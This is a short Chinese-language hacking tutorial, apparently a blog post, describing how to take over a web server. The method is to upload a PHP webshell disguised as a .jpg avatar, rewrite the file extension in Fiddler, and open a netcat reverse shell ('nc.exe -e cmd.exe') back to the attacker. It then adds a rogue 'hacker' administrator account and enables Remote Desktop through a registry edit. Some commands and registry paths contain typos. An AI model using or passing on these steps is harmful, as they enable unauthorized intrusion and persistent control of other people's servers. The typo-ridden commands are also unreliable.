webshell後門上傳流程

標籤：入侵 監聽

1、將webshell.php的尾碼名改成jpg等圖片格式，即web.jpg。

2、開啟相應網址，註冊好帳號後選擇上傳頭像將web.jpg上傳期間運行fiddler並設定斷點，切換到raw介面，等到其提示相應請求代碼後，將其程式碼片段中第二個含有上傳圖片名稱的代碼改成web.php，之後繼續響應請求。

3、此時已經成功把後門程式上傳，將伺服器反饋的代碼中含有路徑的部分複製粘貼到網站URL後面（注意將？php覆蓋）重新整理網頁。

4、然後輸入相應密碼進入控制伺服器端，將原生nc.exe（netcut）上傳到其C盤根目錄下。

5、而後在自己本機開啟cmd命令視窗找到nc.exe所在的目錄並運行

6、這時已經進入nc.exe，在Cmd line:後輸入nc -vv -l -p 8080進行監聽

7、在控制伺服器端選擇Execute Command視窗，輸入‘c:\nc.exe -vv [自身ip 連接埠] -e cmd.exe‘啟動nc（綁定伺服器端主機的cmd.exe在原生相應連接埠）

8、然後就可以添加自己的帳號作為管理員了，具體操作是:

(1) net user hacker 3836546 /add （添加使用者）

(2) net user localgroup administrators test /add （添加到Administrator 群組）

9、寫入註冊表:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

（win2k,winxp,win2k3下開啟遠端桌面,不用重啟）

10、有時還需要修改3389連接埠

[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\Wds\Repwd\Tds\Tcp]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentContro1Set\Control\TenninalServer\WinStations\RDP-Tcp]

11、完成上述流程後，你就可以進入伺服器端的主機進行操作

webshell後門上傳流程